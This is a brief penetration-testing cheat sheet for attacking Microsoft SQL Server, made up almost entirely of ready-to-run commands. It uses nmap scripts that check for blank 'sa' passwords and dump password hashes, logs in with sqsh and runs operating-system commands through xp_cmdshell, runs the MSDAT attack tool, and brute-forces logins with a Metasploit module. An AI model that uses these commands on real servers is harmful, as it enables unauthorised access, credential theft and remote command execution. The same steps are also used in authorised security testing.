Nmap Information Gathering:
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
sqsh – Interactive database shell:
# Log in to mssql sqsh -S 192.168.1.101 -U sa # Execute commands xp_cmdshell 'date' go
MSDAT (Microsoft SQL Database Attacking Tool):
An open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
https://github.com/quentinhardy/msdat
python msdat.py all -s 192.168.1.101
MSSQL Brute Force Attack:
The Metasploit module will simply query the MSSQL instance for a specific user/pass (default is sa with blank).
use auxiliary/scanner/mssql/mssql_login msf auxiliary(mssql_login) > set rhosts 192.168.1.104 msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt msf auxiliary(mssql_login) > run
